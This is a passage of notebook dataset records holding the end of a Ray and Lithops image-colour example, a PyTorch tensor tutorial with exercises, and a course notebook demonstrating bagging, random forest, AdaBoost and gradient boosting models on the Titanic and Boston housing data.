"We now write a Ray task that will return image name and HSV color range of the image. Instead of a direct call to extract_color function, Lithops is being used behind the scenes (through the data object) to call it only at the right moment.",
"_____no_output_____"
]
],
[
[
"@ray.remote\ndef identify_colorspace(data):\n import colorsys\n color, name = data.result()\n\n hsv = colorsys.rgb_to_hsv(color[0], color[1], color[2])\n val = hsv[0] * 180\n return name, val",
"_____no_output_____"
]
],
[
[
"Now let's tie all together with a main method. By using Lithops allows us to remove all the boiler plate code required to list data from the object storage. It also inspects the data source by using the internal Lithops data partitioner and creates a lazy execution plan, where each entry maps an \"extract_color\" function to a single image. Moreover, Lithops creates a single authentication token that is used by all the tasks, instead of letting each task perform authentication. The parallelism is controlled by Ray and once Ray task is executed, it will call Lithops to execute the extract_color function directly in the context of the calling task. Thus, by using Lithops, we can allow code to access object storage data, without requiring additional coding effort from the user.",
"_____no_output_____"
]
],
[
[
"if __name__ == '__main__':\n\n ray.init(ignore_reinit_error=True)\n\n fexec = lithops.LocalhostExecutor(log_level=None)\n my_data = fexec.map(extract_color, 'cos://<bucket>/<path to images>/')\n\n results = [identify_colorspace.remote(d) for d in my_data]\n\n for res in results:\n value = ray.get(res)\n print(\"Image: \" + value[0] + \", dominant color HSV range: \" + str(value[1]))\n ray.shutdown()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb51f8568a90d2096438b0e336c4d82ab0355a2e | 15,079 | ipynb | Jupyter Notebook | intro-to-pytorch/Part 1 - Tensors in PyTorch (Exercises).ipynb | SiAce/Intro-to-Pytorch | 4745e480449b799468eccd92cb205738e0a21eaa | [
"MIT"
] | 1 | 2020-10-14T02:24:44.000Z | 2020-10-14T02:24:44.000Z | intro-to-pytorch/Part 1 - Tensors in PyTorch (Exercises).ipynb | SiAce/Intro-to-Pytorch | 4745e480449b799468eccd92cb205738e0a21eaa | [
"MIT"
] | 5 | 2020-09-26T00:44:44.000Z | 2022-02-10T01:06:37.000Z | intro-to-pytorch/Part 1 - Tensors in PyTorch (Exercises).ipynb | SiAce/Intro-to-Pytorch | 4745e480449b799468eccd92cb205738e0a21eaa | [
"MIT"
] | null | null | null | 41.770083 | 674 | 0.621129 | [
[
[
"# Introduction to Deep Learning with PyTorch\n\nIn this notebook, you'll get introduced to [PyTorch](http://pytorch.org/), a framework for building and training neural networks. PyTorch in a lot of ways behaves like the arrays you love from Numpy. These Numpy arrays, after all, are just tensors. PyTorch takes these tensors and makes it simple to move them to GPUs for the faster processing needed when training neural networks. It also provides a module that automatically calculates gradients (for backpropagation!) and another module specifically for building neural networks. All together, PyTorch ends up being more coherent with Python and the Numpy/Scipy stack compared to TensorFlow and other frameworks.\n\n",
"_____no_output_____"
],
[
"## Neural Networks\n\nDeep Learning is based on artificial neural networks which have been around in some form since the late 1950s. The networks are built from individual parts approximating neurons, typically called units or simply \"neurons.\" Each unit has some number of weighted inputs. These weighted inputs are summed together (a linear combination) then passed through an activation function to get the unit's output.\n\n<img src=\"assets/simple_neuron.png\" width=400px>\n\nMathematically this looks like: \n\n$$\n\\begin{align}\ny &= f(w_1 x_1 + w_2 x_2 + b) \\\\\ny &= f\\left(\\sum_i w_i x_i +b \\right)\n\\end{align}\n$$\n\nWith vectors this is the dot/inner product of two vectors:\n\n$$\nh = \\begin{bmatrix}\nx_1 \\, x_2 \\cdots x_n\n\\end{bmatrix}\n\\cdot \n\\begin{bmatrix}\n w_1 \\\\\n w_2 \\\\\n \\vdots \\\\\n w_n\n\\end{bmatrix}\n$$",
"_____no_output_____"
],
[
"## Tensors\n\nIt turns out neural network computations are just a bunch of linear algebra operations on *tensors*, a generalization of matrices. A vector is a 1-dimensional tensor, a matrix is a 2-dimensional tensor, an array with three indices is a 3-dimensional tensor (RGB color images for example). The fundamental data structure for neural networks are tensors and PyTorch (as well as pretty much every other deep learning framework) is built around tensors.\n\n<img src=\"assets/tensor_examples.svg\" width=600px>\n\nWith the basics covered, it's time to explore how we can use PyTorch to build a simple neural network.",
"_____no_output_____"
]
],
[
[
"# First, import PyTorch\nimport torch",
"_____no_output_____"
],
[
"def activation(x):\n \"\"\" Sigmoid activation function \n \n Arguments\n ---------\n x: torch.Tensor\n \"\"\"\n return 1/(1+torch.exp(-x))",
"_____no_output_____"
],
[
"### Generate some data\ntorch.manual_seed(7) # Set the random seed so things are predictable\n\n# Features are 5 random normal variables\nfeatures = torch.randn((1, 5))\n# True weights for our data, random normal variables again\nweights = torch.randn_like(features)\n# and a true bias term\nbias = torch.randn((1, 1))",
"_____no_output_____"
]
],
[
[
"Above I generated data we can use to get the output of our simple network. This is all just random for now, going forward we'll start using normal data. Going through each relevant line:\n\n`features = torch.randn((1, 5))` creates a tensor with shape `(1, 5)`, one row and five columns, that contains values randomly distributed according to the normal distribution with a mean of zero and standard deviation of one. \n\n`weights = torch.randn_like(features)` creates another tensor with the same shape as `features`, again containing values from a normal distribution.\n\nFinally, `bias = torch.randn((1, 1))` creates a single value from a normal distribution.\n\nPyTorch tensors can be added, multiplied, subtracted, etc, just like Numpy arrays. In general, you'll use PyTorch tensors pretty much the same way you'd use Numpy arrays. They come with some nice benefits though such as GPU acceleration which we'll get to later. For now, use the generated data to calculate the output of this simple single layer network. \n> **Exercise**: Calculate the output of the network with input features `features`, weights `weights`, and bias `bias`. Similar to Numpy, PyTorch has a [`torch.sum()`](https://pytorch.org/docs/stable/torch.html#torch.sum) function, as well as a `.sum()` method on tensors, for taking sums. Use the function `activation` defined above as the activation function.",
"_____no_output_____"
]
],
[
[
"## Calculate the output of this network using the weights and bias tensors\ny_hat = activation(torch.mm(features, weights.T) + bias)\nprint(y_hat)",
"tensor([[0.1595]])\n"
]
],
[
[
"You can do the multiplication and sum in the same operation using a matrix multiplication. In general, you'll want to use matrix multiplications since they are more efficient and accelerated using modern libraries and high-performance computing on GPUs.\n\nHere, we want to do a matrix multiplication of the features and the weights. For this we can use [`torch.mm()`](https://pytorch.org/docs/stable/torch.html#torch.mm) or [`torch.matmul()`](https://pytorch.org/docs/stable/torch.html#torch.matmul) which is somewhat more complicated and supports broadcasting. If we try to do it with `features` and `weights` as they are, we'll get an error\n\n```python\n>> torch.mm(features, weights)\n\n---------------------------------------------------------------------------\nRuntimeError Traceback (most recent call last)\n<ipython-input-13-15d592eb5279> in <module>()\n----> 1 torch.mm(features, weights)\n\nRuntimeError: size mismatch, m1: [1 x 5], m2: [1 x 5] at /Users/soumith/minicondabuild3/conda-bld/pytorch_1524590658547/work/aten/src/TH/generic/THTensorMath.c:2033\n```\n\nAs you're building neural networks in any framework, you'll see this often. Really often. What's happening here is our tensors aren't the correct shapes to perform a matrix multiplication. Remember that for matrix multiplications, the number of columns in the first tensor must equal to the number of rows in the second column. Both `features` and `weights` have the same shape, `(1, 5)`. This means we need to change the shape of `weights` to get the matrix multiplication to work.\n\n**Note:** To see the shape of a tensor called `tensor`, use `tensor.shape`. If you're building neural networks, you'll be using this method often.\n\nThere are a few options here: [`weights.reshape()`](https://pytorch.org/docs/stable/tensors.html#torch.Tensor.reshape), [`weights.resize_()`](https://pytorch.org/docs/stable/tensors.html#torch.Tensor.resize_), and [`weights.view()`](https://pytorch.org/docs/stable/tensors.html#torch.Tensor.view).\n\n* `weights.reshape(a, b)` will return a new tensor with the same data as `weights` with size `(a, b)` sometimes, and sometimes a clone, as in it copies the data to another part of memory.\n* `weights.resize_(a, b)` returns the same tensor with a different shape. However, if the new shape results in fewer elements than the original tensor, some elements will be removed from the tensor (but not from memory). If the new shape results in more elements than the original tensor, new elements will be uninitialized in memory. Here I should note that the underscore at the end of the method denotes that this method is performed **in-place**. Here is a great forum thread to [read more about in-place operations](https://discuss.pytorch.org/t/what-is-in-place-operation/16244) in PyTorch.\n* `weights.view(a, b)` will return a new tensor with the same data as `weights` with size `(a, b)`.\n\nI usually use `.view()`, but any of the three methods will work for this. So, now we can reshape `weights` to have five rows and one column with something like `weights.view(5, 1)`.\n\n> **Exercise**: Calculate the output of our little network using matrix multiplication.",
"_____no_output_____"
]
],
[
[
"## Calculate the output of this network using matrix multiplication",
"_____no_output_____"
]
],
[
[
"### Stack them up!\n\nThat's how you can calculate the output for a single neuron. The real power of this algorithm happens when you start stacking these individual units into layers and stacks of layers, into a network of neurons. The output of one layer of neurons becomes the input for the next layer. With multiple input units and output units, we now need to express the weights as a matrix.\n\n<img src='assets/multilayer_diagram_weights.png' width=450px>\n\nThe first layer shown on the bottom here are the inputs, understandably called the **input layer**. The middle layer is called the **hidden layer**, and the final layer (on the right) is the **output layer**. We can express this network mathematically with matrices again and use matrix multiplication to get linear combinations for each unit in one operation. For example, the hidden layer ($h_1$ and $h_2$ here) can be calculated \n\n$$\n\\vec{h} = [h_1 \\, h_2] = \n\\begin{bmatrix}\nx_1 \\, x_2 \\cdots \\, x_n\n\\end{bmatrix}\n\\cdot \n\\begin{bmatrix}\n w_{11} & w_{12} \\\\\n w_{21} &w_{22} \\\\\n \\vdots &\\vdots \\\\\n w_{n1} &w_{n2}\n\\end{bmatrix}\n$$\n\nThe output for this small network is found by treating the hidden layer as inputs for the output unit. The network output is expressed simply\n\n$$\ny = f_2 \\! \\left(\\, f_1 \\! \\left(\\vec{x} \\, \\mathbf{W_1}\\right) \\mathbf{W_2} \\right)\n$$",
"_____no_output_____"
]
],
[
[
"### Generate some data\ntorch.manual_seed(7) # Set the random seed so things are predictable\n\n# Features are 3 random normal variables\nfeatures = torch.randn((1, 3))\n\n# Define the size of each layer in our network\nn_input = features.shape[1] # Number of input units, must match number of input features\nn_hidden = 2 # Number of hidden units \nn_output = 1 # Number of output units\n\n# Weights for inputs to hidden layer\nW1 = torch.randn(n_input, n_hidden)\n# Weights for hidden layer to output layer\nW2 = torch.randn(n_hidden, n_output)\n\n# and bias terms for hidden and output layers\nB1 = torch.randn((1, n_hidden))\nB2 = torch.randn((1, n_output))",
"_____no_output_____"
]
],
[
[
"> **Exercise:** Calculate the output for this multi-layer network using the weights `W1` & `W2`, and the biases, `B1` & `B2`. ",
"_____no_output_____"
]
],
[
[
"## Your solution here\ny_hat = activation(torch.mm(activation(torch.mm(features, W1) + B1), W2) + B2)\nprint(y_hat)",
"tensor([[0.3171]])\n"
]
],
[
[
"If you did this correctly, you should see the output `tensor([[ 0.3171]])`.\n\nThe number of hidden units a parameter of the network, often called a **hyperparameter** to differentiate it from the weights and biases parameters. As you'll see later when we discuss training a neural network, the more hidden units a network has, and the more layers, the better able it is to learn from data and make accurate predictions.",
"_____no_output_____"
],
[
"## Numpy to Torch and back\n\nSpecial bonus section! PyTorch has a great feature for converting between Numpy arrays and Torch tensors. To create a tensor from a Numpy array, use `torch.from_numpy()`. To convert a tensor to a Numpy array, use the `.numpy()` method.",
"_____no_output_____"
]
],
[
[
"import numpy as np\na = np.random.rand(4,3)\na",
"_____no_output_____"
],
[
"b = torch.from_numpy(a)\nb",
"_____no_output_____"
],
[
"b.numpy()",
"_____no_output_____"
]
],
[
[
"The memory is shared between the Numpy array and Torch tensor, so if you change the values in-place of one object, the other will change as well.",
"_____no_output_____"
]
],
[
[
"# Multiply PyTorch Tensor by 2, in place\nb.mul_(2)",
"_____no_output_____"
],
[
"# Numpy array matches new values from Tensor\na",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb51f90f8f0a7b4ee56ad338326a6d5f1c2a0622 | 160,807 | ipynb | Jupyter Notebook | cs455-chapter7-demos.ipynb | richss/cs455-ml-demos | 7b221a44052ffe8061c14c6b6a80a1122d98574c | [
"Apache-2.0"
] | null | null | null | cs455-chapter7-demos.ipynb | richss/cs455-ml-demos | 7b221a44052ffe8061c14c6b6a80a1122d98574c | [
"Apache-2.0"
] | null | null | null | cs455-chapter7-demos.ipynb | richss/cs455-ml-demos | 7b221a44052ffe8061c14c6b6a80a1122d98574c | [
"Apache-2.0"
] | null | null | null | 120.725976 | 19,180 | 0.869633 | [
[
[
"<h1><center>CS 455/595a: Ensemble Methods - bagging and random forests</center></h1>\n<center>Richard S. Stansbury</center>\n\nThis notebook applies the bagging and random forest ensemble classification and regression concepts concepts covered in [1] with the [Titanic](https://www.kaggle.com/c/titanic/) and [Boston Housing](https://scikit-learn.org/stable/modules/generated/sklearn.datasets.load_boston.html) data sets for DT-based classification and regression, respectively.\n\nNote: you must install the graphviz package for Python. Please do this install using pip or conda. i.e. \"conda install graphviz\"\n\nReference:\n\n[1] Aurelen Geron. *Hands on Machine Learning with Scikit-Learn & TensorFlow* O'Reilley Media Inc, 2017.\n\n[2] Aurelen Geron. \"ageron/handson-ml: A series of Jupyter notebooks that walk you through the fundamentals of Machine Learning and Deep Learning in python using Scikit-Learn and TensorFlow.\" Github.com, online at: https://github.com/ageron/handson-ml [last accessed 2019-03-01]",
"_____no_output_____"
],
[
"**Table of Contents**\n1. [Titanic Survivor Ensemble Classifiers](#Titanic-Survivor-Classifier)\n \n2. [Boston Housing Cost Ensemble Regressors](#Boston-Housing-Cost-Estimator)",
"_____no_output_____"
],
[
"\n",
"_____no_output_____"
],
[
"# Titanic Survivor Classifier\n\n## Set up - Imports of libraries and Data Preparation",
"_____no_output_____"
]
],
[
[
"from sklearn.pipeline import Pipeline, FeatureUnion\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.model_selection import train_test_split\n\nfrom sklearn.metrics import confusion_matrix, precision_score, recall_score, accuracy_score, f1_score \nfrom sklearn.metrics import mean_squared_error, mean_absolute_error\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn import datasets\n\nfrom matplotlib import pyplot as plt\n%matplotlib inline \n\nimport numpy as np\nimport pandas as pd\nimport os\n\n# Read data from input files into Pandas data frames\ndata_path = os.path.join(\"datasets\",\"titanic\")\ntrain_filename = \"train.csv\"\ntest_filename = \"test.csv\"\n\ndef read_csv(data_path, filename):\n joined_path = os.path.join(data_path, filename)\n return pd.read_csv(joined_path)\n\n# Read CSV file into Pandas Dataframes\ntrain_df = read_csv(data_path, train_filename)\n\n# Defining Data Pre-Processing Pipelines\nclass DataFrameSelector(BaseEstimator, TransformerMixin):\n \n def __init__(self, attributes):\n self.attributes = attributes\n \n def fit(self, X, y=None):\n return self\n \n def transform(self, X):\n return X[self.attributes]\n\nclass MostFrequentImputer(BaseEstimator, TransformerMixin):\n \n def fit(self, X, y=None):\n self.most_frequent = pd.Series([X[c].value_counts().index[0] for c in X], \n index = X.columns)\n return self\n \n def transform(self, X):\n return X.fillna(self.most_frequent)\n\n \nnumeric_pipe = Pipeline([\n (\"Select\", DataFrameSelector([\"Age\", \"Fare\", \"SibSp\", \"Parch\"])), # Selects Fields from dataframe\n (\"Imputer\", SimpleImputer(strategy=\"median\")), # Fills in NaN w/ median value for its column\n ])\n\n#Handle categorical string for sex by encoding as female true, 1 or false,0\ntrain_df['Female'] = train_df[\"Sex\"].apply(lambda x: 1 if x == 'female' else 0)\n\ncategories_pipe = Pipeline([\n (\"Select\", DataFrameSelector([\"Pclass\", \"Female\"])), # Selects Fields from dataframe\n (\"MostFreqImp\", MostFrequentImputer()), # Fill in NaN with most frequent\n ])\n\npreprocessing_pipe = FeatureUnion(transformer_list = [\n (\"numeric pipeline\", numeric_pipe), \n (\"categories pipeline\", categories_pipe)\n ]) \n\n# Process Input Data Using Pipleines\ntrain_X_data = preprocessing_pipe.fit_transform(train_df)\n\ntrain_y_data = train_df[\"Survived\"]\n\nfeature_names = [\"Age\", \"Fare\", \"SibSp\", \"Parch\", \"Class\", \"Female\"]\ntarget_names = [\"Died\",\"Survived\"]",
"_____no_output_____"
]
],
[
[
"## KNN Classifier Performance vs. Metrics (for comparison)\n\nThis example is included for comparison by showing the cross validation metric scores for a KNN classifier on the titanic data set.",
"_____no_output_____"
]
],
[
[
"from sklearn.neighbors import KNeighborsClassifier\n\n# KNN Classifier 10-fold Validation\nk=10\nclf = KNeighborsClassifier(n_neighbors=k)\n\ny_pred = cross_val_predict(clf, train_X_data, train_y_data, cv=5)\n\nprint(\"Confusion Matrix:\")\nprint(confusion_matrix(train_y_data, y_pred))\nprint(\"Accuracy Score = \" + str(accuracy_score(train_y_data, y_pred)))\nprint(\"Pecision Score = \" + str(precision_score(train_y_data, y_pred)))\nprint(\"Recall Score = \" + str(recall_score(train_y_data,y_pred)))\nprint(\"F1 Score = \" + str(f1_score(train_y_data,y_pred))) \n ",
"Confusion Matrix:\n[[451 98]\n [176 166]]\nAccuracy Score = 0.6924803591470258\nPecision Score = 0.6287878787878788\nRecall Score = 0.4853801169590643\nF1 Score = 0.5478547854785478\n"
]
],
[
[
"## Bagging Example with KNN\n\nThis example implements a bagging classifier of 500 KNN classifiers with K=10. It then demonstrates the performance metrics for the algorithm under a 5-fold cross validation.",
"_____no_output_____"
]
],
[
[
"from sklearn.ensemble import BaggingClassifier\n\nk=2\nbase_clf = KNeighborsClassifier(n_neighbors=k)\n\nbag_clf = BaggingClassifier(\n base_clf,\n n_estimators = 500,\n max_samples=0.5, \n n_jobs = -1,\n bootstrap=True)\n \ny_pred = cross_val_predict(bag_clf, train_X_data, train_y_data, cv=5)\n\nprint(\"Confusion Matrix:\")\nprint(confusion_matrix(train_y_data, y_pred))\nprint(\"Accuracy Score = \" + str(accuracy_score(train_y_data, y_pred)))\nprint(\"Pecision Score = \" + str(precision_score(train_y_data, y_pred)))\nprint(\"Recall Score = \" + str(recall_score(train_y_data,y_pred)))\nprint(\"F1 Score = \" + str(f1_score(train_y_data,y_pred))) \n\n",
"Confusion Matrix:\n[[439 110]\n [143 199]]\nAccuracy Score = 0.7160493827160493\nPecision Score = 0.6440129449838188\nRecall Score = 0.5818713450292398\nF1 Score = 0.6113671274961596\n"
]
],
[
[
"## Bagging with Decision Tree\n\nThis example implements a bagging classifier of 500 decision trees (constrained to a maximum depth of 10 each). It then demonstrates the performance metrics for the algorithm under a 5-fold cross validation.",
"_____no_output_____"
]
],
[
[
"from sklearn.tree import DecisionTreeClassifier\n\nbase_clf = DecisionTreeClassifier()\n\nbag_clf = BaggingClassifier(\n base_clf,\n n_estimators = 500,\n max_samples=0.5, \n n_jobs = -1,\n bootstrap=True)\n\n# Crossvalidation with our ensemble classifier\ny_pred = cross_val_predict(bag_clf, train_X_data, train_y_data, cv=5)\nprint(\"Confusion Matrix:\")\nprint(confusion_matrix(train_y_data, y_pred))\nprint(\"Accuracy Score = \" + str(accuracy_score(train_y_data, y_pred)))\nprint(\"Pecision Score = \" + str(precision_score(train_y_data, y_pred)))\nprint(\"Recall Score = \" + str(recall_score(train_y_data,y_pred)))\nprint(\"F1 Score = \" + str(f1_score(train_y_data,y_pred))) ",
"Confusion Matrix:\n[[491 58]\n [ 94 248]]\nAccuracy Score = 0.8294051627384961\nPecision Score = 0.8104575163398693\nRecall Score = 0.7251461988304093\nF1 Score = 0.7654320987654322\n"
]
],
[
[
"## Out of Bag Validation\n\nThis examples creates a bagging method ensemble classifier with decision trees up to depth 10. It is configured to output the oob_score, which is the cross validation score. \n",
"_____no_output_____"
]
],
[
[
"from sklearn.tree import DecisionTreeClassifier\n\nk=10\nbase_clf = DecisionTreeClassifier(max_depth=10)\n\nbag_clf = BaggingClassifier(\n base_clf,\n n_estimators = 500,\n max_samples=0.5, \n n_jobs = -1,\n oob_score=True,\n bootstrap=True)\n\nbag_clf.fit(train_X_data, train_y_data)\nbag_clf.oob_score_",
"_____no_output_____"
]
],
[
[
"## Random Forest Example\n\nThis examples creates a random forest of decision tree cassifiers of 500 estimators with a maximum depth limit of 10 for each.\n\nThe output shows the cross validation confusion matrix and the performance metrics.",
"_____no_output_____"
]
],
[
[
"from sklearn.ensemble import RandomForestClassifier\n\nrf_clf = RandomForestClassifier(n_estimators=500, n_jobs=-1, max_depth=10)\n\n# Crossvalidation with our ensemble classifier\ny_pred = cross_val_predict(rf_clf, train_X_data, train_y_data, cv=5)\nprint(\"Confusion Matrix:\")\nprint(confusion_matrix(train_y_data, y_pred))\nprint(\"Accuracy Score = \" + str(accuracy_score(train_y_data, y_pred)))\nprint(\"Pecision Score = \" + str(precision_score(train_y_data, y_pred)))\nprint(\"Recall Score = \" + str(recall_score(train_y_data,y_pred)))\nprint(\"F1 Score = \" + str(f1_score(train_y_data,y_pred))) ",
"Confusion Matrix:\n[[490 59]\n [ 98 244]]\nAccuracy Score = 0.8237934904601572\nPecision Score = 0.8052805280528053\nRecall Score = 0.7134502923976608\nF1 Score = 0.7565891472868217\n"
]
],
[
[
"## Feature Importance and Out of Bag Validation for Random Forest\n\nThis example demonstrates a random forest classifier with the oob_score turned to true.\n\nWe output from it the importance score for each feature. We also output the out of bag cross validation score.",
"_____no_output_____"
]
],
[
[
"from sklearn.ensemble import RandomForestClassifier\n\nrf_clf = RandomForestClassifier(n_estimators=500, n_jobs=-1, max_depth=10, oob_score=True)\nrf_clf.fit(train_X_data, train_y_data)\n\nfor name, score in zip(feature_names, rf_clf.feature_importances_):\n print(name, score)\n \nprint(\"\\n\\nOut of Bag Validation:\", rf_clf.oob_score_)",
"Age 0.21721909381306834\nFare 0.2536476612125953\nSibSp 0.054562077510561045\nParch 0.03991794173716475\nClass 0.10807484699497129\nFemale 0.32657837873163925\n\n\nOut of Bag Validation: 0.8249158249158249\n"
]
],
[
[
"## AdaBoost\n\nThis examples creates a Adaboost classifier ensemble of 100 decision trees using the SAMME.R algorithm and a learning rate of 1.0. \n\nThe output shows the cross validation confusion matrix and the performance metrics. Note the similar performance to the previous ensemble, but with lower precision and recall showing that the model is overfitting a bit.",
"_____no_output_____"
]
],
[
[
"# Adaboost goes here\nfrom sklearn.ensemble import AdaBoostClassifier\n\nada_clf = AdaBoostClassifier(\n DecisionTreeClassifier(max_depth=1), n_estimators=100,\n algorithm=\"SAMME.R\", learning_rate=1.0)\n\n# Crossvalidation with our ensemble classifier\ny_pred = cross_val_predict(ada_clf, train_X_data, train_y_data, cv=5)\nprint(\"Confusion Matrix:\")\nprint(confusion_matrix(train_y_data, y_pred))\nprint(\"Accuracy Score = \" + str(accuracy_score(train_y_data, y_pred)))\nprint(\"Pecision Score = \" + str(precision_score(train_y_data, y_pred)))\nprint(\"Recall Score = \" + str(recall_score(train_y_data,y_pred)))\nprint(\"F1 Score = \" + str(f1_score(train_y_data,y_pred))) ",
"Confusion Matrix:\n[[466 83]\n [ 88 254]]\nAccuracy Score = 0.8080808080808081\nPecision Score = 0.7537091988130564\nRecall Score = 0.7426900584795322\nF1 Score = 0.748159057437408\n"
]
],
[
[
"## Gradient Boost Decision Tree Classifier\n\nThis examples creates a Gradient Boosting Decision Tree Classifier classifier ensemble of decision trees with max depth=5 and 100 estimators in sequence.\n\nThe output shows the cross validation confusion matrix and the performance metrics.",
"_____no_output_____"
]
],
[
[
"from sklearn.ensemble import GradientBoostingClassifier\n\n\ngb_clf = GradientBoostingClassifier(max_depth=5, n_estimators=100)\n\n# Crossvalidation with our ensemble classifier\ny_pred = cross_val_predict(gb_clf, train_X_data, train_y_data, cv=5)\nprint(\"Confusion Matrix:\")\nprint(confusion_matrix(train_y_data, y_pred))\nprint(\"Accuracy Score = \" + str(accuracy_score(train_y_data, y_pred)))\nprint(\"Pecision Score = \" + str(precision_score(train_y_data, y_pred)))\nprint(\"Recall Score = \" + str(recall_score(train_y_data,y_pred)))\nprint(\"F1 Score = \" + str(f1_score(train_y_data,y_pred))) ",
"Confusion Matrix:\n[[492 57]\n [ 99 243]]\nAccuracy Score = 0.8249158249158249\nPecision Score = 0.81\nRecall Score = 0.7105263157894737\nF1 Score = 0.7570093457943925\n"
]
],
[
[
"## Gradient Boost Decision Tree Classifier with Early Stopping\n\nThis examples creates a Gradient Boosting Decision Tree Classifier classifier ensemble of decision trees of max depth = 5 and using early stopping to determine the number of estimators that produced the best results.\n\nThe output shows the cross validation confusion matrix and the performance metrics of a model with the optimal number of estimators.",
"_____no_output_____"
]
],
[
[
"from sklearn.ensemble import GradientBoostingClassifier\n\n# Split the training into a training and validation set\nX_train, X_val, y_train, y_val = train_test_split(train_X_data, train_y_data)\n\nmax_tree_depth=5\n\ngb_clf = GradientBoostingClassifier(max_depth=max_tree_depth, n_estimators=1000)\n\ngb_clf.fit(X_train, y_train)\n\nerrors = [mean_squared_error(y_val, y_pred)\n for y_pred in gb_clf.staged_predict(X_val)]\nbst_n_estimators = np.argmin(errors)\n\nprint(\"Best Number of Estimators:\" + str(bst_n_estimators))\n\ngb_clf = GradientBoostingClassifier(max_depth=max_tree_depth, n_estimators=bst_n_estimators)\n\n# Crossvalidation with our ensemble classifier\ny_pred = cross_val_predict(gb_clf, train_X_data, train_y_data, cv=5)\nprint(\"Confusion Matrix:\")\nprint(confusion_matrix(train_y_data, y_pred))\nprint(\"Accuracy Score = \" + str(accuracy_score(train_y_data, y_pred)))\nprint(\"Pecision Score = \" + str(precision_score(train_y_data, y_pred)))\nprint(\"Recall Score = \" + str(recall_score(train_y_data,y_pred)))\nprint(\"F1 Score = \" + str(f1_score(train_y_data,y_pred))) ",
"Best Number of Estimators:792\nConfusion Matrix:\n[[465 84]\n [101 241]]\nAccuracy Score = 0.792368125701459\nPecision Score = 0.7415384615384616\nRecall Score = 0.7046783625730995\nF1 Score = 0.7226386806596703\n"
]
],
[
[
"# Boston Housing Cost Estimator\n\nBuilding off the classifier examples above, this section shows ensemble regressors using bagging and random forests.",
"_____no_output_____"
],
[
"## Setup",
"_____no_output_____"
]
],
[
[
"# Load Data Set\nboston_housing_data = datasets.load_boston()\n\ntrain_X, test_X, train_y, test_y = train_test_split(boston_housing_data.data,\n boston_housing_data.target,\n test_size=0.33)\n\ndef plot_learning_curves(model, X, y):\n \"\"\"\n Plots performance on the training set and testing (validation) set.\n X-axis - number of training samples used\n Y-axis - RMSE\n \"\"\"\n \n train_X, test_X, train_y, test_y = train_test_split(X, y, test_size = 0.20)\n \n training_errors, validation_errors = [], []\n \n for m in range(1, len(train_X)):\n \n model.fit(train_X[:m], train_y[:m])\n \n train_pred = model.predict(train_X)\n test_pred = model.predict(test_X)\n \n training_errors.append(np.sqrt(mean_squared_error(train_y, train_pred)))\n validation_errors.append(np.sqrt(mean_squared_error(test_y, test_pred)))\n \n plt.plot(training_errors, \"r-+\", label=\"train\")\n plt.plot(validation_errors, \"b-\", label=\"test\")\n plt.legend()\n plt.axis([0, 80, 0, 3])",
"_____no_output_____"
]
],
[
[
"## Linear Regression on Boston Data Set (for comparison)\n\nFor comparison a linear regression on the boston data is shown.",
"_____no_output_____"
],
[
"\n",
"_____no_output_____"
]
],
[
[
"from sklearn.linear_model import LinearRegression\n\nlin_reg = LinearRegression()\nlin_reg.fit(train_X,train_y)\npred_y = lin_reg.predict(test_X)\n\n# Outputs the intercept and coefficient of the model (theta_0 and theta_1 respectively)\nprint(\"Theta:\")\nprint(lin_reg.intercept_, lin_reg.coef_)\n\nplt.figure(\"a\")\nplt.hist(abs(test_y - pred_y),bins=100)\nplt.xlabel(\"Error ($k)\")\n\nprint(\"MAE = \" + str(mean_absolute_error(test_y, pred_y)))\n\nplt.figure(\"b\")\nplot_learning_curves(lin_reg, train_X, train_y)\nplt.axis([0,300,0,10])",
"Theta:\n33.790769307759966 [-1.25483446e-01 5.11865930e-02 1.63927974e-02 9.85173229e-01\n -1.76808023e+01 4.03838469e+00 -7.64654037e-03 -1.47655876e+00\n 2.94368239e-01 -1.35171374e-02 -8.57046534e-01 8.61252482e-03\n -4.63613220e-01]\nMAE = 3.440300129807153\n"
]
],
[
[
"## Bagging Regressor using Linear Regression as Base\n\nThis example implements a bagging regressor with a linear regression model as the base classifier. It shows the histogram of the price estimation error. It also shows the learning curve for the model.",
"_____no_output_____"
]
],
[
[
"## Bagging with Linear Regression\n\nfrom sklearn.ensemble import BaggingRegressor\nfrom sklearn.linear_model import LinearRegression\n\nbase_reg = LinearRegression()\n\nbag_reg = BaggingRegressor(\n base_reg,\n n_estimators = 500,\n max_samples=1.0,\n n_jobs = -1,\n bootstrap=False) #Not replacement for this configuration\n\nbag_reg.fit(train_X, train_y)\n\npred_y = bag_reg.predict(test_X)\n\n# Outputs the intercept and coefficient of the model (theta_0 and theta_1 respectively)\nprint(\"Theta:\")\nprint(lin_reg.intercept_, lin_reg.coef_)\n\nplt.figure(\"a\")\nplt.hist(abs(test_y - pred_y),bins=100)\nplt.xlabel(\"Error ($k)\")\n\nprint(\"MAE = \" + str(mean_absolute_error(test_y, pred_y)))\n\nplt.figure(\"b\")\nplot_learning_curves(lin_reg, train_X, train_y)\nplt.axis([0,300,0,10])",
"Theta:\n42.388643481735116 [-1.31802391e-01 6.28212122e-02 1.33939743e-02 7.39270347e-01\n -1.98008368e+01 3.28625061e+00 3.49330152e-04 -1.67420484e+00\n 3.11479966e-01 -1.26756831e-02 -8.92430146e-01 6.05986473e-03\n -5.71054167e-01]\nMAE = 3.4403001298071096\n"
]
],
[
[
"## Random Forest Regression Example\n\nThis example implements a random forest regressor using decision trees up to depth 10. It shows the histogram of the price estimation error. It also shows the learning curve for the model.",
"_____no_output_____"
]
],
[
[
